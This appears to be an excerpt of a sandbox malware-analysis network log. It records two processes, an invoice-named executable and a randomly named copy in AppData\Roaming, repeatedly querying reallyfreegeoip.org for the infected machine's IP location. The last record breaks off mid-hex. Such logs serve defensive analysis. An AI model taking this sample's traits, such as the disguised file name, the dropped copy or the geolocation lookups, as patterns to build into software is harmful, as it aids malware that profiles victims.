2024-09-30 13:03:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:12 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:12 UTC	680	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17423 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8zUu3uRmBe%2FMv2SSQPke7u4bDI8zu%2BtAAdP0BMUkandLMf43%2BjiasQM1lNdTeAuB2tRR%2BH9uF3oZ14Hqt5HF%2BDyVknMBguGSGV8TaZjhIOx2tGKucVLD8AVO2NAbhp5Ny4Wnu4w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469695bcd4299-EWR
2024-09-30 13:03:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:14 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:14 UTC	682	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17425 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KrCQw1zsIvPc25%2B%2BRH4SPo1K%2Bfd1I12KOQOP5RMtLMT3uhyYlsy6HlUZQLlaPtGKcH1Tusbjh9e8BQD0Bu2Z1r%2FxQK7Sc36XmAb%2FdcY%2FpIg625JJ44mH7CmmufiwN76CBb7T3GR6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469731b3843a9-EWR
2024-09-30 13:03:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:14 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17425 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGHISRFRI8rrs8Zv4k21D4yHEKFzT5Zg7lBqv%2BiW3qG2Ce4PGoJZC4kH40FQtttsf68yrkzIMSz01YP9%2Bjk0hG4EOhQgMMXZs4gOZTBD0FfqXneLJu0%2Bnz2sS6aYDN6f4j9kwbAE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb46972ef6041e0-EWR
2024-09-30 13:03:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:17 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:17 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17428 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qGKXibb3Z7urffIAtXtJqaHCbAumYPwDKBSFpa3KQ57oZoB%2Fkcz5EngeObfjDfBcwrW0iufcjDUVzIbGgPKmO8c2DkqkaIJ3Tfgxy5jfocWvS6bvU%2BbxtPNxqM1MPc89roM2iDbT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb46983ccc119a1-EWR
2024-09-30 13:03:17 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:17 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:17 UTC	672	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17428 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpfdUtPxJ8jC7ctHF9FK3CBK3QR0AvmFIe7xtuecBbSNEy6budkqWGA3eYAOSCg4xz4gNRhDKYcsmSVbDrixdLMO5WYovZLJnAzYFIM7snPfsVMCqO0CoOEe0Ly31a92DJOEq1Gm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469856b86437f-EWR
2024-09-30 13:03:17 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:20 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:20 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17431 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyLvZ6nW1Ffg0gR%2BGgcJk7n3y87Q4vowx2PrsbV969E60vXH%2BZK6J5KOb8T454tuzvJxULSQxJVIzea39HmCFPwNVEzKSX7G3ryLAJj%2Fm4jo7z4uoixfTVAxzHQeBiF1YJFkmeQt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb4699a5bbe4375-EWR
2024-09-30 13:03:20 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:21 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17432 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdBv1KhwlxZgZMA7YpOCtxXMgAwqUIrzuoV%2F9%2BIEVKaYkXh9YMT6XyI8k3YrQFubWuivu%2BTsnW9YtwrrAhlQvjeU21wy%2F4jPy0WG%2Bymndjlr6c1YmJx9EKF6GrRQOzJhaujcOYA7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb4699d8c6a43d7-EWR alt-svc: h3=":443"; ma=86400
2024-09-30 13:03:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49761	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:24 UTC	678	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17435 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4friEx%2F6SoawIqeVlRhaVEMttKEHM7t9s22eG9rC2JRlVgLi2ttp%2BEpGJwEQbEpkyimlqmoxM%2FUeGkE1P1koHdZWz0W0JaUMXaBgfnGfHExJlzX3hRg2ttPqenMbAlX%2BdP6lwdUC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469b3db5c43a0-EWR
2024-09-30 13:03:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49763	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:25 UTC	684	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17436 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tX7tK%2BTAJJjUQ54gSkILkJV20m%2BvrXiP6li94zFMisVLcN%2BIX62sa0q8HhClMc%2FLS8ID3pajLXfrTmiw19%2FFn%2B9ggfy7cZD%2FinLODM9ieCMulzgO3i9H8bgRv4q2bT4hOny7wVFC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469bb08618cb9-EWR
2024-09-30 13:03:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49765	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:28 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17439 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9VQL2gQxAZ6CNJ7S2Rd2KgJ3inTl1oELQu5K9bGHB9ypIC54ONhkrT98fpSpBN1TP4U93aK1htyihTSLKxZ0y9y5PTkSDTrhG8IqoSc%2BeZnNBsKm%2FejcIwy5vUrUUcMd3YVchsb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469c85f7c0f7b-EWR
2024-09-30 13:03:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 